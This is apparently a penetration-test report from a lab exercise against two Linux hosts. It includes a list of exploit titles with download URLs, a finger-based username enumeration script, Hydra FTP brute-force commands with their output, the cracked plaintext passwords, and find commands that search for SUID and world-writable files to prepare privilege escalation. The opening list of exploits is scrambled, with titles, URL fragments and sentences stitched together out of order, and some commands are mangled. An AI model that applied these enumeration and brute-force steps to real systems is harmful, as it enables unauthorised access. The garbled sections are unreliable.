2.txt.http://www.anyside.txt.txt.Snort 2.org/exp/exploits/remote/2008071701.txt.17 Remote Directory Listing Vulnerability 2006-08-21.Apache 2.20 Remote Buffer Overflow Exploit 2007-07-08.org/exp/exploits/remote/2008040401.0.anyside.Snort 2.Apache Tomcat Connector jk2-2.anyside.anyside.anyside.http://www.anyside.txt.Apache Tomcat (webdav) Remote File Disclosure Exploit 2007-10-21.http://www.org/exp/exploits/remote/2007040701.37.Apache mod_jk 1.anyside.2005-06-07.01a (Pegasus) IMAP Buffer Overflow Exploit 2006-03-10.1 DCE/RPC Preprocessor Remote Buffer Overflow DoS Exploit 2007-03-01.MS Windows DCE-RPC svcctl ChangeServiceConfig2A() Memory Corruption 2007-03-21.http://www.Apache Tomcat Connector (mod_jk) Remote Exploit (exec-shield) 2007-09-03.org/exp/exploits/remote/2006092701.anyside.txt.dll) RPC Server DoS Exploit 2007-02-23.org/exp/exploits/remote/2008040601.org/exp/exploits/remote/2007102101.http://www.CCProxy <= v6.txt.5.txt.http://www.org/exp/exploits/remote/2007030102.2.http://www.http://www.txt.0 SP3 (IMAP) Remote Buffer Overflow Exploit (2) 2006-09-27.Mercury Mail 4.2 Telnet Proxy Ping Overflow Exploit (meta) 2007-10-14.txt.anyside.org/exp/exploits/remote/2007121805.anyside.org/exp/exploits/remote/2007032101.http://www.1 DCE/RPC Preprocessor Remote Buffer Overflow Exploit (linux) 2007-04-07.1 (LOGIN) Remote IMAP Stack Buffer Overflow Exploit 2007-03-30.org/exp/exploits/remote/2006060506.6.org/exp/exploits/remote/2007022306.txt.txt.0 SP3 (IMAP) Remote Buffer Overflow Exploit 2006-03-19.Snort 2.anyside.2 (mod_jk2) Remote Overflow Exploit 2008-06-30.9 (IMAP FLAGS) Remote SEH Overwrite Exploit 0day 2007-06-22.org/exp/exploits/remote/2007090301.http://www.anyside.3 (mod_rewrite) Remote Overflow PoC 2006-09-11.19/1.http://www.txt.org/exp/exploits/remote/2007020107.anyside.http://www.txt.anyside.org/exp/exploits/remote/2006031903.http://www.2.Dropbear / OpenSSH Server (MAX_UNAUTH_CLIENTS) Denial of Service 2006-03-19.txt.Sun Solaris <= 10 rpc.http://www.Apache Tomcat (webdav) Remote File Disclosure Exploit (ssl support) 2007-12-18.59.0.org/exp/exploits/remote/2007053001.org/exp/exploits/remote/2007041501.org/exp/exploits/remote/2005060701.0 SP3 (IMAP) Denial of Service Exploit 2006-06-05.org/exp/exploits/remote/2007031002.Linux Kernel < 2.http://www.6.txt. 2.CA BrightStor ARCserve 11.anyside.Apache Tomcat < 5.6.anyside.5.Surgemail 39e-1 Post Auth IMAP Remote Buffer Overflow DoS 2008-07-17.1.anyside.org/exp/exploits/remote/2007032101.org/exp/exploits/remote/2007032401.org/exp/exploits/remote/2007052601.txt.http://www.http://www.16.Eudora 7.org/exp/exploits/remote/2006031002.Mercur Mailserver 5.Apache Mod_Rewrite Off-by-one Remote Overflow Exploit (win32) 2007-04-15.txt.txt.http://www.anyside.org/exp/exploits/remote/2007070801.txt.org/exp/exploits/remote/2006072301.anyside.anyside.3.http://www.org/exp/exploits/remote/2008063003.anyside.http://www.0 (catirpc.http://www.anyside.http://www.txt.http://www.org/exp/exploits/remote/2007062201.OpenSSH <= 4.http://www.http://www.MS Windows DNS RPC Remote Buffer Overflow Exploit (port 445) 2007-05-26.anyside.org/exp/exploits/remote/2005092001.Mercur Messaging 2005 <= SP4 IMAP Remote Exploit (egghunter mod) 2007-03-21.anyside.txt.anyside.txt. .0 installation. Reviewing the source code for this exploit reveals that this exploit appears to match all of the required criteria.anyside.txt.. The execution of the exploit was unsuccessful.http://www.c. removing exploits that don't match the operating system. don't match the software installed.6d and below. ii.mountd 2. The execution of the exploit was unsuccessful.http://www.c. The code was successfully compiled after making minor modifications to the source to provide missing openssl include files.2beta29 remote root exploit.19 Remote Buffer Overflow Exploit (win32) 2008-08-11. The “.org/exp/exploits/remote/2008090503.18 UTF8 Directory Traversal Vulnerability 2008-09-05.Remo te exploit for Apache + OpenSSL v0.Apache Tomcat <= 6.org/exp/exploits/remote/2008090501.4. The following lists the exploits in the order they were attempted (from most to least likely to work).txt.org/exp/exploits/remote/OpenFuckV2.Linux rpc.http://www.MicroTik RouterOS <= 3. Remote exploit for Apache + OpenSSL v0.txt. The code was successfully compiled after making major modifications to the source to fix syntax issues due to line wrapping/formatting defects. Exploits – round 1 The 3 exploits found were downloaded and reviewed.20-8 is more commonly associated with a Red Hat 9.anyside.ADM mountd exploit .org/exp/exploits/remote/2008071801.http://www.” and “20050430.anyside..http://www.org/exp/exploits/remote/Snmppd.anyside.9. This exploit is based upon the openssl-too-open exploit by Solar Eclipse and offers more than 130 targets including various flavors of Linux.http://www.anyside...mountd 2.. “.org/exp/exploits/remote/2008081101.Linux rpc.OpenSSH Remote SELinux Privilege Elevation Exploit (auth) 2008-07-17. the kernel version 2.0 installation rather than a Red Hat 8.13 SNMP write (Set request) PoC While this list looks impressive in length.2beta29 remote root exploit”.Apache mod_jk 1.http://www.13 SNMP write (Set request) PoC 2008-09-05.c.Bea Weblogic Apache Connector Code Exec / Denial of Service Exploit 2008-07-18.2.txt.org/exp/exploits/remote/2008071702. don't match the proper version or don't provide a privilege escalation leaves only 3 exploits.MicroTik RouterOS <= 3. ADM mountd exploit . While the Apache version matches perfectly.0.txt.6d and below.http://www.anyside..9.anyside.Snmppd SNMP proxy daemon format string exploit” exploits. ! Snmppd SNMP proxy daemon format string exploit.org/exp/exploits/remote/ADMmountd.. ! ! .anyside. the secwatch. The possibility of this exploit being successful was deemed to be very slim. The rh addition to the version may indicate that Red Hat has applied a patch to resolve the vulnerability.txt" done < $2 . only one additional exploit was located.org list.1 server.org site was used to continue the search. $ cat fingerListOfUserNames. The list of user names was generated by googling for a list of common user names. The exploit was successfully compiled after making minor modifications to the source to fix syntax issues due to line wrapping/formatting defects. D. only the “root”. a shell script executing finger over a list of user names was implemented. The service was fingerprinted as “UW Imapd 2001. The “UW imapd IMAP 4.Reviewing the code for this exploit reveals that the exploit was written in 1998. the only additional exploit located was the “UW imapd IMAP 4.1 server” exploit. Abuse of finger The finger service running on port 79/tcp provides us with the ability to brute force user names on the cptvm1 host. The search results were quite extensive compared to the anyside. The VM running back|track3 did not have a proper finger client installed so this command was executed from the host machine under OSX. do finger ${userName}@$1 >> "usersOn$1_RAW. iii.315 version of the uw-imapd service. Reviewing the output from the finger command reveals that of the 18 user accounts. User discovery i. However. The code was successfully compiled without issues. The execution of the exploit was unsuccessful.sh #!/bin/bash while read userName. To accomplish this. The execution of the exploit was unsuccessful. Exploits – round 2 After quite an extensive review of possible exploits. Research via secwatch.org Having exhausted the exploits known to the anyside.315rh”. ! UW imapd IMAP 4.org site. “user” and “postgres” users have the ability to login to a standard shell.1 server”. The names of 18 users on the cptvm1 host were discovered. This exploit is meant for the 2001. iv. 200_RAW.200 usernames.txt $ cat usersOn192.5p1 (protocol 1.txt" | sort -u > "usersOn$1.txt" > "usersOn$1_FOUND.40 (Red Hat Linux) 109/tcp POSSIBLY pop2 110/tcp pop3 ipopd 2001.1.sh 192. 161. 37.sed -e '/^finger:/d' -e "/^\[$1/d" "usersOn$1_RAW.168. 111.99) 23/tcp telnet Linux telnetd 79/tcp finger Linux fingerd 80/tcp http Apache httpd 2.txt $ ls -alF total 96 drwxr-xr-x drwxr-xr-x -rwxr-xr-x -rw-r--r--rw-r--r--rw-r--r--rw-r--r-- 7 11 1 1 1 1 1 matt matt matt matt matt matt matt matt matt matt matt matt matt matt 238 374 291 3550 107 4699 26235 Feb Feb Feb Feb Feb Feb Feb 11 10 11 10 11 11 11 22:23 19:12 22:06 19:31 22:06 21:46 21:46 .168.1.txt" $ fingerListOfUserNames./ ./ fingerListOfUserNames.0. 80. 21. 32768. 22.1. 23.txt" awk '/^Login:/ { print $2 }' "usersOn$1_FOUND. 79..168. 443.200) Operating system: Linux Kernel version: 2.4.78rh 111/tcp rpcbind 2 (rpc #100000) 143/tcp imap UW Imapd 2001. 686. 110.40 (Red Hat Linux) 686/tcp rquotad 1-2 (rpc #100011) 993/tcp imaps 995/tcp pop3s 6000/tcp X11 32768/tcp status 1 (rpc #100024) 32770/tcp mountd 1-3 (rpc #100005) UDP ports: 7.200. the systems of interest are configured as follows: cptvm1 (192. 13.1. 631.315rh 199/tcp smux Linux SNMP multiplexer 443/tcp ssl/http Apache httpd 2. 995.3 22/tcp ssh OpenSSH 3.1. 993.168.0.20-8 TCP ports: 7.txt adm apache daemon ftp lp mail nfsnobody nobody nscd operator postgres root rpc rpcuser sshd user uucp vcsa From the information gathered during this step.168.168.txt usersOn192.txt usersOn192.txt usersOn192. 123.sh* usernames. 143. 111.1. 199.200.1. 6000.200_FOUND. 162. 109. 32770 TCP services: 7/tcp echo 21/tcp ftp vsftpd 1. 683 UDP services: . operator.7/udp echo 13/udp daytime 37/udp time (32 bits) 111/udp rpcbind 2 (rpc #100000) 123/udp ntp 161/udp snmp SNMPv1 server (public) 162/udp snmptrap 631/udp unknown 683/udp rquotad 1-2 (rpc #100011) User accounts: adm.use allowed only for legal purposes.org) starting at 2009-01-27 22:57:29 [DATA] 16 tasks. a brute force attack against the password of the “user” and “postgres” accounts was attempted. ftp.2.9 . Hydra (http://www.txt 192.4 (c) 2006 by van Hauser / THC .txt -P passwords/passwords. lp. root. 139758 login tries (l:2/p:69879). The result of this attack was the discovery of the password.users. apache. nobody.23 TCP ports: 22. The user accounts file was populated by taking the user accounts configured to login within a standard shell. Discovery of password for “user” account As various remote exploits have been unsuccessful. uucp. user. 939 TCP services: 22/tcp ssh 111/tcp rpcbind 939/tcp status OpenSSH 4. rpc.0) 2 (rpc #100000) 1 (rpc #100024) E. a list of passwords to be provided and the protocol to be used.200 ftp Hydra v5.thc. ~8734 tries per task [DATA] attacking service ftp on port 21 .168. mail. Typically. vcsa cptvm2 (192. daemon. bt user # cat usernames/cptvm1.6. nscd. for the “user” account.3 (protocol 2. The passwords list was located by googling for a list of the most common passwords used. neither of these techniques was applied.104) Operating system: Linux Kernel version: Linux 2. postgres. rpcuser. “digital”. Brute force password guessing i.1. The hydra utility was selected as it allows a list of user names to be provided.168. 1 servers. 111.users.txt user postgres bt user # hydra -e n -L usernames/cptvm1. sshd. In the case of the ftp service listening on port 21/tcp.1. An unsuccessful attempt to login to the cptvm2 host using the “user” name and password was also attempted. nfsnobody. The root user was removed from the list as the ftp service did not allow root logins.6. password guessing of user accounts is stifled with configuration items like: locking user accounts after exceeding a maximum number of login attempts or by providing an exponentially increasing delay length between invalid login attempts. The credentials were validated by sshing into the ctpvm1 host. mail. 32100 tries in 01:19h.27 tries/min. 38602 tries in 01:35h. 6084 tries in 00:15h. lp. 161. 64627 tries in 02:39h.168.168. 37. nfsnobody.200) Operating system: Linux Kernel version: 2. postgres.00 tries/min.53 tries/min.33 tries/min.40 (Red Hat Linux) 109/tcp POSSIBLY pop2 110/tcp pop3 ipopd 2001.200 (waiting for childs to finish) Hydra (http://www. root. 12588 tries in 00:31h.4. 127170 todo in 05:14h [STATUS] 406. nobody. 88145 todo in 03:37h [STATUS] 406. 97160 tries in 03:59h. 94652 todo in 03:53h [STATUS] 406. operator.thc. 683 UDP services: 7/udp echo 13/udp daytime 37/udp time (32 bits) 111/udp rpcbind 2 (rpc #100000) 123/udp ntp 161/udp snmp SNMPv1 server (public) 162/udp snmptrap 631/udp unknown 683/udp rquotad 1-2 (rpc #100011) User accounts: adm. 19092 tries in 00:47h. 62119 todo in 02:33h [STATUS] 406.46 tries/min. 42598 todo in 01:45h [STATUS] attack finished for 192. 51613 tries in 02:07h. ftp.36 tries/min.40 tries/min.78rh 111/tcp rpcbind 2 (rpc #100000) 143/tcp imap UW Imapd 2001. 111. 80.00 tries/min.21 tries/min.60 tries/min. 71133 tries in 02:55h. 101156 todo in 04:09h [STATUS] 406. vcsa Username/password: user/digital cptvm2 (192. 402 tries in 00:01h. 32768.40 (Red Hat Linux) 686/tcp rquotad 1-2 (rpc #100011) 993/tcp imaps 995/tcp pop3s 6000/tcp X11 32768/tcp status 1 (rpc #100024) 32770/tcp mountd 1-3 (rpc #100005) UDP ports: 7. 90656 tries in 03:43h.168.org) finished at 2009-01-28 03:05:41 From the information gathered during this step.[STATUS] 402. 1206 tries in 00:03h. daemon. the systems of interest are configured as follows: cptvm1 (192. 84145 tries in 03:27h.53 tries/min. 114163 todo in 04:42h [21][ftp] host: 192.104) . apache. 995. 993.1.1.200 login: user password: digital [STATUS] 406. 68625 todo in 02:49h [STATUS] 406. 120666 todo in 04:58h [STATUS] 406. 133674 todo in 05:30h [STATUS] 406. 81639 todo in 03:21h [STATUS] 406. uucp. nscd. 25595 tries in 01:03h.43 tries/min.1. rpcuser. 443. 77639 tries in 03:11h.20-8 TCP ports: 7. 686.06 tries/min. 21. 109. 111. 107658 todo in 04:25h [STATUS] 406.0.71 tries/min. 49102 todo in 02:01h [STATUS] 406.50 tries/min. 631.5p1 (protocol 1. 58119 tries in 02:23h.1. 13.99) 23/tcp telnet Linux telnetd 79/tcp finger Linux fingerd 80/tcp http Apache httpd 2. 139356 todo in 05:47h [STATUS] 402.47 tries/min.34 tries/min. 110. 162. rpc.0.168. 138552 todo in 05:45h [STATUS] 404. user. 123. 75131 todo in 03:05h [STATUS] 406. 55613 todo in 02:17h [STATUS] 406.1. 22. 143. 23.315rh 199/tcp smux Linux SNMP multiplexer 443/tcp ssl/http Apache httpd 2. 2833 tries in 00:07h. 79. 32770 TCP services: 7/tcp echo 21/tcp ftp vsftpd 1. 136925 todo in 05:39h [STATUS] 405. 199. 45106 tries in 01:51h. sshd. 6000.49 tries/min.3 22/tcp ssh OpenSSH 3. txt -P passwords/passwords. 139342 todo in 05:35h [STATUS] 405. 126771 todo in 13:56h The session file . 6096 tries in 00:15h.6. a second attack to discover the “cptvm2” account password had to be completed. While researching the configuration of the cptvm1 host. 128910 todo in 01:24h [STATUS] 151.txt 192.40 tries/min. Type "hydra -R" to resume .00 tries/min. a brute force password guessing attack was launched against the “cptvm1” and “cptvm2” users.restore was written. bt ~ # cat usernames/cptvm1.2. 2848 tries in 00:07h.use allowed only for legal purposes.78 tries/min.thc.3 (protocol 2. 1216 tries in 00:03h. 133662 todo in 05:29h The session file .restore was written. Type "hydra -R" to resume session.9 . 136910 todo in 05:37h [STATUS] 406. the /etc/passwd file was reviewed. were identified. “cptvm1” and “cptvm2”. Discovery of password for “cptvm1” and “cptvm2” accounts Upon the successful login to the cptvm1 host.200 ftp Hydra v5. 8410 tries in 00:01h.users2. 131348 todo in 00:16h [STATUS] 3072.1.org) starting at 2009-01-28 18:26:44 [DATA] 16 tasks. This switch instructs hydra to stop executing as soon as a valid user name/password pair is found.86 tries/min. 139758 login tries (l:2/p:69879). 416 tries in 00:01h. 1 servers. 1 servers. The /etc/passwd file on the cptvm2 host was reviewed for accounts of interest. Hydra (http://www.use allowed only for legal purposes. 12987 tries in 01:25h./hydra.Operating system: Linux Kernel version: Linux 2. As a result of the incorrect switch. cptvm2/linux).168.00 tries/min. 111.0) 2 (rpc #100000) 1 (rpc #100024) ii. The initial attack had an incorrect switch in the command line (-f). ~8734 tries per task [DATA] attacking service ftp on port 21 [STATUS] 416. 138542 todo in 05:42h [STATUS] 406.users2. ~8734 tries per task [DATA] attacking service ftp on port 21 [STATUS] 8410.thc./hydra.6. 130542 todo in 00:43h [STATUS] 1549. Two accounts of high interest. This action provided all of the names for the user accounts on the cptvm1 host. 9216 tries in 00:03h.23 TCP ports: 22.4 (c) 2006 by van Hauser / THC .org) starting at 2009-01-28 20:38:12 [DATA] 16 tasks. The end result of the attacks were the discovery of the “cptvm1” and “cptvm2” passwords (cptvm1/windows.txt cptvm1 cptvm2 bt ~ # hydra -e n -f -L usernames/cptvm1. 10848 tries in 00:07h. 139758 login tries (l:2/p:69879). Hydra (http://www. bt ~ # hydra -R Hydra v5. Successful ssh connections were also established to the cptvm2 host using the accounts.71 tries/min.00 tries/min.33 tries/min. The credentials were validated by sshing into the cptvm1 host via using both accounts. 939 TCP services: 22/tcp ssh 111/tcp rpcbind 939/tcp status OpenSSH 4.4 (c) 2006 by van Hauser / THC . 44290 todo in 01:50h [STATUS] 406. 443.43 tries/min.99) 23/tcp telnet Linux telnetd .1. 34614 tries in 00:31h. 22. 57300 todo in 02:22h [STATUS] 406. 111656 todo in 00:60h [STATUS] 1116.72 tries/min.67 tries/min. 45097 tries in 01:51h.thc.4 (c) 2006 by van Hauser / THC . 32768. 21. 117338 todo in 00:06h [STATUS] 7740. Type "hydra -R" to resume session. 199. 995. 37788 todo in 01:34h [STATUS] 406. 67135 tries in 01:51h. 1 servers.200 (valid pair found) Hydra (http://www. 80.use allowed only for legal purposes. 19083 tries in 00:47h. 85632 todo in 02:05h [STATUS] 638. 110.58 tries/min. Hydra (http://www. 67055 todo in 02:47h [STATUS] 405. 143. 401 tries in 00:01h. 1 servers.00 tries/min.00 tries/min.1.1.168. 47622 tries in 01:03h.28 tries/min. 24854 tries in 00:07h.restore was written.thc.use allowed only for legal purposes. 23222 tries in 00:03h.168. 60630 tries in 01:35h. Hydra (http://www.26 tries/min.200 ftp Hydra v5.session.77 tries/min.47 tries/min. ~8734 tries per task [DATA] attacking service ftp on port 21 The session file . 41112 tries in 00:47h.org) starting at 2009-01-28 21:12:53 [DATA] 16 tasks. 50796 todo in 02:06h [STATUS] 406. 79128 todo in 02:04h [STATUS] 604.17 tries/min. 6075 tries in 00:15h. 139758 login tries (l:2/p:69879).200 login: cptvm1 password: windows [STATUS] attack finished for 192.1.thc.1.200 login: cptvm2 password: linux [STATUS] attack finished for 192. 6000. 1203 tries in 00:03h.use allowed only for legal purposes.thc. 79.org) starting at 2009-01-29 22:54:56 [DATA] 16 tasks.168. 31284 todo in 01:18h [STATUS] 406.4 (c) 2006 by van Hauser / THC .57 tries/min.200) Operating system: Linux Kernel version: 2. the systems of interest are configured as follows: cptvm1 (192. 32770 TCP services: 7/tcp echo 21/tcp ftp vsftpd 1.1.00 tries/min.90 tries/min. Hydra (http://www.168.org) finished at 2009-01-30 00:47:01 From the information gathered during this step. 69879 login tries (l:1/p:69879). 109./hydra.168. 32091 tries in 01:19h.20-8 TCP ports: 7. 686.4 (c) 2006 by van Hauser / THC .1. 98646 todo in 01:53h [STATUS] 755.14 tries/min.org) starting at 2009-01-28 21:12:39 [DATA] 16 tasks. ~4367 tries per task [DATA] attacking service ftp on port 21 [STATUS] 401. 23.00 tries/min. 1 servers. 12579 tries in 00:31h. 72623 todo in 02:01h [21][ftp] host: 192.3 22/tcp ssh OpenSSH 3. 105144 todo in 01:35h [STATUS] 874. 92136 todo in 02:02h [STATUS] 685.168.21 tries/min. 38595 tries in 01:35h. 25589 tries in 01:03h. 111. 22420 tries in 00:01h. 114904 todo in 00:33h [STATUS] 1873. 69478 todo in 02:54h [STATUS] 401. 68676 todo in 02:52h [STATUS] 403.5p1 (protocol 1.82 tries/min. ~8734 tries per task [DATA] attacking service ftp on port 21 [STATUS] 22420. bt ~ # hydra -R Hydra v5. bt ~ # hydra -R Hydra v5.02 tries/min.org) finished at 2009-01-28 23:04:25 bt ~ # hydra -e n -l cptvm2 -P passwords/passwords.thc. 54126 tries in 01:19h.4. 24782 todo in 01:01h [21][ftp] host: 192. 116536 todo in 00:16h [STATUS] 3550. 993.200 (waiting for childs to finish) Hydra (http://www.txt 192.22 tries/min. 2824 tries in 00:07h. 28102 tries in 00:15h. 139758 login tries (l:2/p:69879). 63804 todo in 02:38h [STATUS] 405. pcap. user. mail.1. named.315rh 199/tcp smux Linux SNMP multiplexer 443/tcp ssl/http Apache httpd 2. news.104) Operating system: Linux Kernel version: Linux 2. pcap. cptvm2. cptvm2/linux F. xfs Username/password: cptvm1/windows. 939 TCP services: 22/tcp ssh OpenSSH 4. nobody. mailnull.2. games.0. news. cptvm1. rpc. nfsnobody. 37. daemon. 631. smmsp. root. nscd. This may provide the ability to access data or executables we normally should not have privileges to. uucp. Research of cptvm1 and cptvm2 hosts i.40 (Red Hat Linux) 109/tcp POSSIBLY pop2 110/tcp pop3 ipopd 2001. rpcuser.79/tcp finger Linux fingerd 80/tcp http Apache httpd 2. apache. webalizer. 111. rpcuser. files having permissions incorrectly set to allow anyone to read/write/execute them and files owned by one of the accounts with a known password. shutdown. webalizer. 162. apache. 161. named.168. rpm. gopher. gdm. sshd. cptvm1/windows. halt. gdm. daemon. The location of all files owned by the “cptvm1”.23 TCP ports: 22. 111. uucp. ftp. root. vcsa.78rh 111/tcp rpcbind 2 (rpc #100000) 143/tcp imap UW Imapd 2001. 123. games.6. bin. rpc. haldaemon.0. rpm.40 (Red Hat Linux) 686/tcp rquotad 1-2 (rpc #100011) 993/tcp imaps 995/tcp pop3s 6000/tcp X11 32768/tcp status 1 (rpc #100024) 32770/tcp mountd 1-3 (rpc #100005) UDP ports: 7. lp.6. cptvm1. “cptvm2” and “user” accounts (accounts we have passwords for) were gathered. vcsa. lp. ftp.9 . postgres. . xfs Username/password: user/digital. distcache. cptvm2. operator. smmsp. cptvm2/linux cptvm2 (192. cptvm1 Various data was gathered pertaining to the permissions of files within the system. 683 UDP services: 7/udp echo 13/udp daytime 37/udp time (32 bits) 111/udp rpcbind 2 (rpc #100000) 123/udp ntp 161/udp snmp SNMPv1 server (public) 162/udp snmptrap 631/udp unknown 683/udp rquotad 1-2 (rpc #100011) User accounts: adm. squid. nfsnobody. sync. bin. halt. gopher. shutdown. sshd sync. nscd. avahi. mail. squid. mailnull.0) 111/tcp rpcbind 2 (rpc #100000) 939/tcp status 1 (rpc #100024) User accounts: adm. Items of interest were files having permissions set to run as root. 13. ntp.3 (protocol 2. nobody. dbus. ntp operator. 993. 109. 22. 23.40 (Red Hat Linux) 686/tcp rquotad 1-2 (rpc #100011) 993/tcp imaps 995/tcp pop3s .3 22/tcp ssh OpenSSH 3.0.99) 23/tcp telnet Linux telnetd 79/tcp finger Linux fingerd 80/tcp http Apache httpd 2. This will provide a list of executables that should be researched for exploits. 32768.1. 686.4.0. 80.168.txt The information gathered during this phase was used mainly for exploit research.78rh 111/tcp rpcbind 2 (rpc #100000) 143/tcp imap UW Imapd 2001.200) Operating system: Linux Kernel version: 2. [cptvm1@cptvm1 ~ ]$ find / -type f -a -not -type l -a -perm +003 -printf "%m %u %g %h/%f\\n" > ~/find-typef-a-not-typel-a-perm003_200. [cptvm1@cptvm1 ~ ]$ find / -type f -a -not -type l -a -perm +030 -a \( -group cptvm1 -o -group cptvm2 -o -group user \) -printf "%m %u %g %h/%f\\n" > ~/find-typef-a-not-typel-a-perm030-a-groupcptvm1-ogroupcptvm2ogroupuser_200.txt The locations of all files that are owned by a group we have access to and are readable or executable were gathered. 6000.1. 995. 21. From the information gathered during this step.40 (Red Hat Linux) 109/tcp POSSIBLY pop2 110/tcp pop3 ipopd 2001. 32770 TCP services: 7/tcp echo 21/tcp ftp vsftpd 1. 443. the systems of interest are configured as follows: cptvm1 (192.txt The locations of all files having read and execute permissions set for “other” were gathered. 143. This may provide the ability to read data or execute tasks we normally should not have privileges to. 79.315rh 199/tcp smux Linux SNMP multiplexer 443/tcp ssl/http Apache httpd 2. [cptvm1@cptvm1 ~ ]$ find / -type f -a -not -type l -a -perm +4000 -printf "%m %u %g %h/%f\\n" > ~/find-typef-a-not-typel-a-perm4000_200. 111. 199.20-8 TCP ports: 7.[cptvm1@cptvm1 ~ ]$ find / -type f -a \( -user cptvm1 -o -user cptvm2 -o -user user \) -printf "%m %u %g %h/%f\\n" > ~/find-typef-a-usercptvm1-o-usercptvm2ouseruser_200. This may provide the ability to read data or execute tasks we normally should not have privileges to.5p1 (protocol 1. 110.txt The locations of all files that are set to execute as the root user were gathered. news. sshd sync. halt. /usr/bin/rsh. /usr/bin/newgrp.0) 111/tcp rpcbind 2 (rpc #100000) 939/tcp status 1 (rpc #100024) User accounts: adm. haldaemon. /usr/lib/news/bin/rnews. nfsnobody. /usr/sbin/ping6. rpcuser. ntp operator. shutdown. ntp. /bin/umount. cptvm1. nobody. dbus. /usr/bin/rlogin. /usr/bin/gpasswd. cptmv2 Various data was gathered pertaining to the kernel version and permissions of files within the system. /bin/mount. mail. apache. gdm. mail. avahi.3 (protocol 2. To gather this information. games. bin. files having permissions incorrectly set to allow anyone to read/write/execute them and files owned by one of the accounts with a known password. ftp. games. daemon. apache. /sbin/unix_chkpwd.6. 37. 161. user. nobody.2. root. sshd. operator.168. 123. pcap. uucp. squid. smmsp. nscd. cptvm1/windows. /usr/bin/chage. 13. mailnull. lp. 111. 111. 939 TCP services: 22/tcp ssh OpenSSH 4. cptvm1.1. 683 UDP services: 7/udp echo 13/udp daytime 37/udp time (32 bits) 111/udp rpcbind 2 (rpc #100000) 123/udp ntp 161/udp snmp SNMPv1 server (public) 162/udp snmptrap 631/udp unknown 683/udp rquotad 1-2 (rpc #100011) User accounts: adm. lp. squid. cptvm2. /bin/su. news. /sbin/pam_timestamp_check. the uname commands was used. /usr/lib/news/bin/startinnfeed. /usr/bin/rcp. uucp. /usr/sbin/userisdnctl.18-8. pcap. /bin/ping. webalizer. /usr/sbin/traceroute.104) Operating system: Linux Kernel version: Linux 2. daemon. vcsa. bin. /usr/bin/chfn.el5 #1 SMP Thu Mar 15 19:57:35 EDT 2007 i686 i686 i386 GNU/Linux The locations of all files owned by the “cptvm1” and “cptvm2” accounts . rpcuser. /usr/libexec/openssh/ssh-keysign. gdm. /usr/sbin/userhelper. rpc. [cptvm1@localhost ~ ]$ uname -a Linux localhost. /sbin/pwdb_chkpwd. webalizer. rpc.6000/tcp X11 32768/tcp status 1 (rpc #100024) 32770/tcp mountd 1-3 (rpc #100005) UDP ports: 7. shutdown. 631. halt.6. Items of interest were files having permissions set to run as root. distcache.9 . vcsa. sync. cptvm2. cptvm2/linux cptvm2 (192. smmsp. named. nscd. /usr/bin/passwd. 162. mailnull. /usr/sbin/usernetctl Username/password: user/digital. /usr/bin/crontab. /usr/sbin/traceroute6.23 TCP ports: 22. /usr/bin/at. /usr/X11R6/bin/XFree86. the specific version of the Linux kernel was not known. gopher. root.6. Up to this point. rpm. /usr/lib/news/bin/inndstart. nfsnobody.localdomain 2. xfs Files that execute as root: /usr/bin/sudo. /usr/bin/chsh. gopher. ftp. /usr/sbin/suexec. /usr/bin/lppasswd. cptvm2/linux ii. xfs Username/password: cptvm1/windows. postgres. rpm. named. [cptvm1@localhost ~ ]$ find / -type f -a -not -type l -a -perm +4000 -printf "%m %u %g %h/%f\\n" > ~/find-typef-a-not-typel-a-perm4000_104.txt The information gathered during this phase was used mainly for exploit research. 21. 6000.99) 23/tcp telnet Linux telnetd 79/tcp finger Linux fingerd 80/tcp http Apache httpd 2. 686. 995. This may provide the ability to read data or execute tasks we normally should not have privileges to.org). 109. 143. 32768. 23.http://www.txt The locations of all files that are owned by a group we have access to and are readable or executable were gathered. 79. 111. the systems of interest are configured as follows: cptvm1 (192.20-8 TCP ports: 7.txt The locations of all files having read and execute permissions set for “other” were gathered. [cptvm1@localhost ~ ]$ find / -type f -a -not -type l -a -perm +003 -printf "%m %u %g %h/%f\\n" > ~/find-typef-a-not-typel-a-perm003_104. Next Generation scoring tool .0.200) Operating system: Linux Kernel version: 2.40 (Red Hat Linux) 109/tcp POSSIBLY pop2 110/tcp pop3 ipopd 2001. [cptvm1@localhost ~ ]$ find / -type f -a \( -user cptvm1 -o -user cptvm2 \) -printf "%m %u %g %h/%f\\n" > ~/find-typef-a-usercptvm1-o-usercptvm2_104. the CISngtool (Center for Internet Security.168. 32770 TCP services: 7/tcp echo 21/tcp ftp vsftpd 1.78rh . [cptvm1@localhost ~ ]$ find / -type f -a -not -type l -a -perm +030 -a \( -group cptvm1 -o -group cptvm2 \) -printf "%m %u %g %h/%f\\n" > ~/find-typefa-not-typel-a-perm030-a-groupcptvm1-ogroupcptvm2_104. several files of interest were discovered.5p1 (protocol 1. 110. Namely. 993. 80. 443.txt The locations of all files that are set to execute as the root user were gathered. This may provide the ability to read data or execute tasks we normally should not have privileges to. This will provide a list of executables that should be researched for exploits. This may provide the ability to access data or executables we normally should not have privileges to. 22. However.1. 199.4. From the information gathered during this step.3 22/tcp ssh OpenSSH 3.cisecurity.(accounts we have passwords for) were gathered.1. /usr/lib/squid/ncsa_auth. cptvm2. 683 UDP services: 7/udp echo 13/udp daytime 37/udp time (32 bits) 111/udp rpcbind 2 (rpc #100000) 123/udp ntp 161/udp snmp SNMPv1 server (public) 162/udp snmptrap 631/udp unknown 683/udp rquotad 1-2 (rpc #100011) User accounts: adm. rpm.nfs4. 161. 631. /bin/umount. ftp. gopher. rpc. /usr/bin/chfn. rpm. /usr/bin/gpasswd. gdm. bin. /usr/sbin/userhelper. /bin/ping. /usr/bin/sudoedit. /usr/bin/passwd. haldaemon. nfsnobody. mailnull. /sbin/pam_timestamp_check. xfs Files that execute as root: /usr/bin/sudo. nscd. uucp. /usr/lib/news/bin/startinnfeed. smmsp. /usr/bin/rsh. cptvm1/windows. lp. ntp operator. named. /usr/bin/chage. /sbin/pam_timestamp_check.hal-mtablock. /usr/bin/chsh. /usr/lib/news/bin/inndstart. /usr/sbin/traceroute. rpc. /sbin/umount. shutdown. /usr/sbin/userhelper. Local exploit research via anyside.111/tcp rpcbind 2 (rpc #100000) 143/tcp imap UW Imapd 2001. nobody. /usr/sbin/usernetctl Username/password: user/digital. smmsp. sync. /usr/lib/news/bin/rnews. webalizer. /usr/bin/chfn. squid. gdm.nfs4. /usr/sbin/userisdnctl. distcache. 13. /usr/bin/rcp. postgres. /usr/sbin/suexec. 111. nobody.1. games. /bin/umount. /usr/bin/passwd. /usr/sbin/userisdnctl. 162. /usr/bin/rlogin. dbus. webalizer.0) 111/tcp rpcbind 2 (rpc #100000) 939/tcp status 1 